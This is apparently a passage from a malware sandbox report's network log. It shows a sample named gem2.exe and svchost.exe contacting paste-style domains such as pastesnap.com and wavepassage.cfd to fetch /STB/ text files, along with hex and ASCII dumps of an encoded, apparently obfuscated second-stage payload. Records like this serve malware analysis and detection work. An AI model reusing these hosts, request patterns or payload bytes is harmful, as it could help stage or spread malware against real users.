                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsMiMSUaKni8vzRXxZz2KX7AdvQHk71hbFLxZJImKwy85dsJHecmOJqeNNHgKqInv7TbV%2BGng70ROd0WDjfK3B4041E4LTrr8WdiZFD9jZ3Diqg0fn7jlPD4Ru7IeFjucNeu"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc478788b4339-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1603&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              143192.168.2.750394188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:27.379749060 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.852879047 CET878INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0Y5hkz2FitN%2B%2FCf2juUCGvncHNlQjJD3YF2RtZuv6kY76P0JDWJw6tdkCfdOs9%2FH2wRPuhshQ1ZcF9Vkbq5u94zNgtSys1rxHX%2B%2Bbk802%2BCg1RvHOlVyU7BjTDrsuZC1U0%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47abbf48c33-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1888&rtt_var=944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              144192.168.2.750396104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:27.494734049 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.941625118 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qJXRNvLgfFgrLUO%2FDN4rx6NKU9cpzcZfbwBeqVLSUqWRHXd%2Bd7ldSHB3ucDoJoZH9VRMVDCHI0%2BMHSEeQcNUphbVwP3fDFriA9iHfKAgi5s%2BEtuYRc810x1RAvTP6dnFEL8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47b5fdc7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              145192.168.2.750398172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:27.859731913 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.325730085 CET864INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wD9v6Ax8SJIQ757D6rC68M0pgIK6Cc3y2Khq4vxg6OPurIhp2%2FonMEsRN6cOQ%2F6020hmWfAHZLYZe10T%2BWVN%2ByCYaAp93PDCzEUqf4v2uyIubRoQfkHs5%2BNVvtfUlPx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47dac804258-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              146192.168.2.750403172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:28.335030079 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.793081999 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pnckGmeXwpnAOmIHBfJofuOJNV2yI5T%2F17FD%2Bm5SafNbnKox4BfUfAxCB%2Be%2BqoSFcHGiQuJ3%2BAIbjzG%2F7ZmVqpufCXMrmkLFBIR6xGA7rhWYwhCZMYFwd6LhvQTRnYiPBEzb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4809cad426b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              147192.168.2.750405188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:28.429495096 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.911421061 CET872INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C104iSGBORZwaxnmdbbY%2BXiZml6vlO%2FxQIOYgLvCHdF6K1Xjuyz9dKUzakmTuONNOP20TKjydBnRJdCIen0Y13wu9cgy0enSIKzwqecPFcifdZ2YKG5PNarYY180qtBpK%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4815c99efa5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1968&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              148192.168.2.750407104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:28.799590111 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:29.259738922 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:29 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctwUOpPA7dEcUcqQuf3%2BZvZjpwNRxH5W03rIFtRAp%2Fno0P0D9PxypmcdpsK03HOFep7boIhlHrlC3ce%2F%2FWcwLAmDw6e79B9rzR1SCpfj7SG8228it8rZQGEQEmYS3CsSizBN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4838897c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              149192.168.2.750409172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:28.918548107 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:29.373922110 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:29 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkG6oBmvndZOfjJZRqYHT25rFuTkutHBSEs8A1TZJAk3Mw6Q1DxBhMe7%2B8UIZTEjdDTBFwl1%2BNFWxtDBeULiqjog%2FSet75UOxZmhU%2BCP5IZ4PQqPKIGMgg2tiQMskirK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4843a7d43b8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749702104.21.60.1724432692C:\Users\user\Desktop\gem2.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-12 08:26:20 UTC110OUTGET /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              User-Agent: URL Checker
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:20 UTC925INHTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:20 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Sat, 11 Jan 2025 00:57:39 GMT
                                                              ETag: W/"804395cfc363db1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLRj8%2FeF%2FjAIk7mJ5mmESpxdbP8ZfImkQBbj3MlabWh6fQn5V26oFWHOA8qmKwhFaN%2Bu1YSTOmc737sQclqIazTNdXxzykQIS%2BDN22otu48HLS%2BC2AhuPVfHJS%2FdWVF0"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc2d75ecd0cb4-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1604&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=748&delivery_rate=1795817&cwnd=245&unsent_bytes=0&cid=721699ad11dd7434&ts=1129&x=0"
                                                              2025-01-12 08:26:20 UTC444INData Raw: 34 62 31 62 0d 0a 49 53 2f 2b 59 57 39 31 62 6d 46 6f 64 57 35 68 6b 34 70 75 59 64 52 31 62 6d 46 73 64 57 35 68 4c 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 37 48 56 75 59 57 4a 71 31 47 39 73 77 57 65 73 54 63 31 76 4c 61 46 55 4f 67 6b 46 42 6b 34 52 48 68 6f 4a 45 77 30 59 54 67 49 4e 47 77 41 4f 47 46 55 4d 42 45 77 48 47 77 39 4d 48 41 42 42 4b 44 6f 39 51 51 45 61 43 67 52 43 65 47 4e 72 53 48 56 75 59 57 78 31 62 6d 45 38 4d 47 35 68 43 50 4e 6e 59 57 69 31 37 77 5a 73 64 57 35 68 62 48 56 75 59 5a 78 31 54 47 46 6e 64 32 42 49 62 43 74 73 59 57 79 68 62 6d 46 73 64 57 35 68 4c 5a 49 66 59 57 78 6c 62 6d 46 73 64 57 34 68 62 58 56 75 59 57 78 6c 62
                                                              Data Ascii: 4b1bIS/+YW91bmFodW5hk4puYdR1bmFsdW5hLHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5h7HVuYWJq1G9swWesTc1vLaFUOgkFBk4RHhoJEw0YTgINGwAOGFUMBEwHGw9MHABBKDo9QQEaCgRCeGNrSHVuYWx1bmE8MG5hCPNnYWi17wZsdW5hbHVuYZx1TGFnd2BIbCtsYWyhbmFsdW5hLZIfYWxlbmFsdW4hbXVuYWxlb
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 78 31 62 6d 46 73 64 57 35 68 78 4b 77 66 59 55 52 31 62 6d 47 63 50 71 39 68 4c 48 52 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 4e 55 65 59 61 78 32 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 43 41 51 73 5a 47 48 56 75 59 65 51 70 62 47 46 73 5a 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 4d 64 57 34 42 51 67 63 4b 41 42 67 55 62 6d 45 30 31 32 35 68 62 41 56 73 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 4c 48 56 75 49 55 49 52 44 78 55 4e 64 57 35 68 4c 47 5a 75 59 57 78 56 62 57 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 53 78 31 62 71 46 43 42 51 6f 41 47 42 52 75 59
                                                              Data Ascii: x1bmFsdW5hxKwfYUR1bmGcPq9hLHRuYWx1bmFsdW5hbNUeYax2bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFCAQsZGHVuYeQpbGFsZW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFMdW4BQgcKABgUbmE0125hbAVsYWx1bmFsdW5hbHVuYWx1bmFsdW5hLHVuIUIRDxUNdW5hLGZuYWxVbWFsdW5hbHVuYWx1bmFsdW5hbHVuYSx1bqFCBQoAGBRuY
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 68 62 48 56 75 59 65 78 41 31 57 46 73 64 57 35 68 39 41 76 56 59 57 78 31 62 6d 47 79 6d 74 4a 68 62 48 56 75 59 54 53 35 30 32 46 73 64 57 35 68 34 75 50 53 59 57 78 31 62 6d 46 34 4d 39 4e 68 62 48 56 75 59 54 6a 6b 72 6d 46 73 64 57 35 68 4f 6f 4c 55 59 57 78 31 62 6d 48 4b 36 74 56 68 62 48 56 75 59 61 70 56 30 6d 46 73 64 57 35 68 50 49 72 53 59 57 78 31 62 6d 47 34 55 4b 35 68 62 48 56 75 59 64 70 61 30 57 46 73 64 57 35 68 56 47 4c 51 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 63 30 57 46 73 64 57 35 68 45 49 2f 53 59 57 78 31 62 6d 45 38 59 74 4a 68 62 48 56 75 59 5a 59 71 48 32 46 73 64 57 35 68 75 73 50 56 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 59 49 6e 72 6d 46 73 64 57 35 68 35 71 63 66 59 57 78 31 62 6d 47 67 41 64
                                                              Data Ascii: hbHVuYexA1WFsdW5h9AvVYWx1bmGymtJhbHVuYTS502FsdW5h4uPSYWx1bmF4M9NhbHVuYTjkrmFsdW5hOoLUYWx1bmHK6tVhbHVuYapV0mFsdW5hPIrSYWx1bmG4UK5hbHVuYdpa0WFsdW5hVGLQYWx1bmFsdW5hbHVuYWxc0WFsdW5hEI/SYWx1bmE8YtJhbHVuYZYqH2FsdW5husPVYWx1bmFsdW5hbHVuYYInrmFsdW5h5qcfYWx1bmGgAd
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 70 5a 2b 54 69 70 48 62 54 52 38 5a 7a 30 57 6c 43 58 38 46 68 50 6b 2f 33 52 77 42 74 32 30 73 38 64 66 46 74 46 48 33 4a 58 56 42 74 6f 31 38 57 56 39 64 7a 4a 6e 2f 65 4c 31 37 76 35 6f 76 77 64 55 49 6a 57 73 66 73 68 42 68 35 65 43 79 4b 36 67 71 33 31 45 56 38 4c 49 7a 78 36 70 6f 4b 55 33 34 76 51 6c 6b 4a 72 72 51 6e 35 4f 4b 4d 33 33 70 42 31 70 70 31 71 61 79 65 6f 4d 42 62 6d 46 73 64 65 34 63 2b 63 35 2b 75 76 56 41 4d 5a 64 46 31 41 47 6d 64 77 30 68 53 78 38 52 54 45 69 4e 66 78 78 75 78 6b 5a 30 64 45 68 42 5a 71 45 30 72 61 2b 75 4e 2f 37 71 4f 37 37 71 57 6d 42 73 64 57 36 5a 2b 55 65 4e 4a 53 31 30 62 6d 46 78 61 79 78 72 79 50 6a 73 78 31 58 79 2b 44 79 32 41 35 41 78 46 52 4d 68 50 47 6c 5a 58 58 75 79 75 2b 42 44 2b 7a 49 36 67 51 75
                                                              Data Ascii: pZ+TipHbTR8Zz0WlCX8FhPk/3RwBt20s8dfFtFH3JXVBto18WV9dzJn/eL17v5ovwdUIjWsfshBh5eCyK6gq31EV8LIzx6poKU34vQlkJrrQn5OKM33pB1pp1qayeoMBbmFsde4c+c5+uvVAMZdF1AGmdw0hSx8RTEiNfxxuxkZ0dEhBZqE0ra+uN/7qO77qWmBsdW6Z+UeNJS10bmFxayxryPjsx1Xy+Dy2A5AxFRMhPGlZXXuyu+BD+zI6gQu
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 38 6c 37 73 77 4b 63 75 35 6e 66 4c 72 6c 54 77 6b 7a 38 67 66 64 4f 48 70 50 46 4c 46 73 42 70 36 61 68 6b 78 4b 45 52 42 48 51 5a 72 46 37 69 72 58 50 4c 36 50 4c 6b 4a 36 54 63 49 71 38 74 67 51 6b 7a 6e 32 77 52 71 72 6d 52 41 6f 73 77 67 34 4b 6f 44 59 61 66 43 6b 4f 39 4b 34 4b 41 32 52 36 71 70 4b 4b 6b 5a 35 54 37 68 6d 62 48 6b 6b 4b 77 36 5a 42 34 72 75 50 67 58 4a 44 35 79 46 44 4f 2f 38 4a 79 30 4f 33 47 59 74 4c 37 71 6c 62 36 33 34 42 41 79 74 50 4d 65 48 47 4e 36 50 6b 6e 48 70 78 35 6d 61 33 63 33 4f 73 48 65 6e 5a 44 6b 39 54 45 2b 78 74 6b 52 61 4f 65 47 73 38 58 4a 72 42 5a 72 48 5a 4f 36 48 66 6b 6f 71 52 6c 32 7a 74 67 43 51 53 59 50 67 4c 64 67 45 4c 72 4e 46 70 46 62 67 72 74 57 77 74 4f 79 31 79 55 51 50 6d 79 49 4b 6a 35 59 4b 50
                                                              Data Ascii: 8l7swKcu5nfLrlTwkz8gfdOHpPFLFsBp6ahkxKERBHQZrF7irXPL6PLkJ6TcIq8tgQkzn2wRqrmRAoswg4KoDYafCkO9K4KA2R6qpKKkZ5T7hmbHkkKw6ZB4ruPgXJD5yFDO/8Jy0O3GYtL7qlb634BAytPMeHGN6PknHpx5ma3c3OsHenZDk9TE+xtkRaOeGs8XJrBZrHZO6HfkoqRl2ztgCQSYPgLdgELrNFpFbgrtWwtOy1yUQPmyIKj5YKP
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 2b 6a 32 76 6f 42 51 51 61 6c 46 63 6d 73 48 6d 46 73 64 57 34 67 76 4b 2b 70 2b 37 34 4d 47 79 6b 4e 43 38 6a 42 52 5a 50 78 69 53 33 72 47 43 6e 4e 61 2b 6b 42 56 51 74 49 6c 47 31 76 70 42 42 33 42 61 61 46 76 65 38 63 6a 33 2b 61 5a 6c 56 31 49 46 54 6e 42 2f 49 57 67 76 57 58 4c 50 38 76 61 67 61 46 62 62 68 54 6e 4e 55 46 4c 6d 42 73 64 57 34 46 77 53 65 58 4e 4e 53 6c 51 4f 59 30 39 65 69 2b 39 4e 54 59 54 79 52 31 77 44 61 4d 66 56 67 75 56 50 57 34 4c 73 51 30 6b 4a 61 55 52 4c 42 48 66 48 78 41 78 68 45 68 74 6a 62 67 6f 39 4e 6b 52 57 6d 35 6e 69 68 62 57 34 54 46 32 57 37 2b 7a 2f 74 62 56 4b 55 78 49 65 59 33 38 33 54 73 62 5a 46 6d 45 39 6e 4d 48 69 46 74 64 57 35 68 51 4a 42 30 30 42 5a 56 42 71 63 44 78 55 59 76 65 79 55 58 42 37 4e 39 6e
                                                              Data Ascii: +j2voBQQalFcmsHmFsdW4gvK+p+74MGykNC8jBRZPxiS3rGCnNa+kBVQtIlG1vpBB3BaaFve8cj3+aZlV1IFTnB/IWgvWXLP8vagaFbbhTnNUFLmBsdW4FwSeXNNSlQOY09ei+9NTYTyR1wDaMfVguVPW4LsQ0kJaURLBHfHxAxhEhtjbgo9NkRWm5nihbW4TF2W7+z/tbVKUxIeY383TsbZFmE9nMHiFtdW5hQJB00BZVBqcDxUYveyUXB7N9n
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 63 62 2b 2b 36 7a 6c 32 74 4f 4b 77 59 66 38 33 4f 57 69 32 50 6c 47 42 4c 43 53 69 75 30 6f 75 52 6e 6d 70 31 42 32 63 73 43 65 34 4e 68 2b 62 74 69 73 30 75 67 70 72 67 78 69 34 71 70 56 51 56 45 58 35 58 6d 34 52 78 70 72 57 71 6b 6f 71 52 6e 74 35 4f 67 46 49 64 79 35 43 65 6b 36 73 4e 4c 57 2b 35 73 6b 68 4a 33 70 46 74 50 2b 58 73 5a 39 58 62 4b 6e 77 33 50 36 75 55 6b 78 4f 37 52 65 42 31 34 5a 32 2b 44 70 70 72 68 67 65 4a 41 51 55 57 45 41 4a 48 76 65 65 44 4e 6e 54 31 77 66 6b 70 33 62 76 5a 61 78 78 65 36 36 51 32 39 71 4e 38 6a 37 34 72 56 4c 59 4f 53 2f 7a 65 78 6c 4b 73 33 71 36 36 39 71 43 6a 76 2f 6f 76 4a 75 69 38 76 72 34 34 64 5a 32 75 61 6c 77 53 78 64 68 56 76 62 6b 32 59 50 75 7a 52 57 63 77 71 50 56 75 74 2f 38 36 78 47 65 62 6e 51
                                                              Data Ascii: cb++6zl2tOKwYf83OWi2PlGBLCSiu0ouRnmp1B2csCe4Nh+btis0ugprgxi4qpVQVEX5Xm4RxprWqkoqRnt5OgFIdy5Cek6sNLW+5skhJ3pFtP+XsZ9XbKnw3P6uUkxO7ReB14Z2+DpprhgeJAQUWEAJHveeDNnT1wfkp3bvZaxxe66Q29qN8j74rVLYOS/zexlKs3q669qCjv/ovJui8vr44dZ2ualwSxdhVvbk2YPuzRWcwqPVut/86xGebnQ
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 42 61 4c 72 76 55 2b 68 33 35 4b 4b 6b 57 66 42 63 43 57 42 74 7a 32 73 63 58 56 7a 4c 6d 30 54 36 6f 69 71 6b 6f 71 52 6e 73 57 64 58 71 4c 6a 35 78 57 6c 51 48 2f 34 6c 51 42 2f 2f 4e 69 64 65 6e 33 35 58 43 6e 56 79 6b 34 43 30 4a 2b 54 69 73 51 42 49 73 42 42 31 72 30 38 67 4e 34 36 6b 58 4b 64 68 4d 56 47 4c 38 74 74 6e 2b 37 2f 76 6a 31 55 77 58 38 31 30 79 79 73 35 69 41 5a 43 67 78 65 52 71 64 63 79 2b 63 35 49 78 5a 73 64 57 37 68 45 33 74 71 65 47 69 42 33 33 76 70 67 37 59 77 70 4e 63 4c 4c 42 74 31 62 6d 46 73 66 61 54 71 42 4c 45 42 66 4c 71 4c 58 49 34 4c 58 4f 2b 75 35 56 41 68 6c 30 30 74 51 52 62 64 62 43 6b 2f 46 5a 56 70 54 31 32 38 6b 55 5a 4e 2f 54 6c 2f 4c 36 4e 48 30 4c 73 36 53 68 33 35 58 36 31 51 78 49 77 50 5a 6f 4a 70 36 37 55
                                                              Data Ascii: BaLrvU+h35KKkWfBcCWBtz2scXVzLm0T6oiqkoqRnsWdXqLj5xWlQH/4lQB//Niden35XCnVyk4C0J+TisQBIsBB1r08gN46kXKdhMVGL8ttn+7/vj1UwX810yys5iAZCgxeRqdcy+c5IxZsdW7hE3tqeGiB33vpg7YwpNcLLBt1bmFsfaTqBLEBfLqLXI4LXO+u5VAhl00tQRbdbCk/FZVpT128kUZN/Tl/L6NH0Ls6Sh35X61QxIwPZoJp67U
                                                              2025-01-12 08:26:20 UTC1369INData Raw: 41 54 7a 71 2f 30 49 2b 30 39 4a 37 7a 71 4f 38 74 47 68 62 5a 56 59 4a 43 69 65 62 48 56 75 36 58 73 71 4c 6d 6b 6f 58 72 6b 37 58 51 6e 36 79 31 34 78 67 54 4c 4b 4b 77 61 41 51 75 4f 75 69 4a 71 4b 6e 6f 69 69 49 31 36 34 43 6b 75 57 4d 57 4c 53 46 73 47 34 37 50 76 6c 66 4f 37 57 49 2f 42 69 65 66 6c 66 65 54 30 37 47 6c 61 56 69 68 4c 49 31 47 51 4a 59 50 46 45 7a 74 74 58 77 48 4b 6b 4e 62 4a 59 2b 43 41 6f 6d 6a 4e 6e 6b 6e 57 62 65 39 39 53 39 43 44 56 56 45 4b 55 6b 57 64 32 6a 64 73 45 38 36 73 74 32 61 4d 4b 38 4c 43 46 30 64 48 4e 4d 69 55 47 6f 49 5a 54 71 31 6a 46 56 61 47 70 36 76 6b 59 56 6e 31 73 2b 6b 52 55 41 53 4b 55 73 4c 76 6f 4b 7a 54 73 67 7a 62 55 2b 41 2f 6f 77 70 5a 58 58 4d 4a 69 6c 6a 43 43 30 52 41 62 77 62 6f 4e 2b 2b 35 69
                                                              Data Ascii: ATzq/0I+09J7zqO8tGhbZVYJCiebHVu6XsqLmkoXrk7XQn6y14xgTLKKwaAQuOuiJqKnoiiI164CkuWMWLSFsG47PvlfO7WI/BieflfeT07GlaVihLI1GQJYPFEzttXwHKkNbJY+CAomjNnknWbe99S9CDVVEKUkWd2jdsE86st2aMK8LCF0dHNMiUGoIZTq1jFVaGp6vkYVn1s+kRUASKUsLvoKzTsgzbU+A/owpZXXMJiljCC0RAbwboN++5i
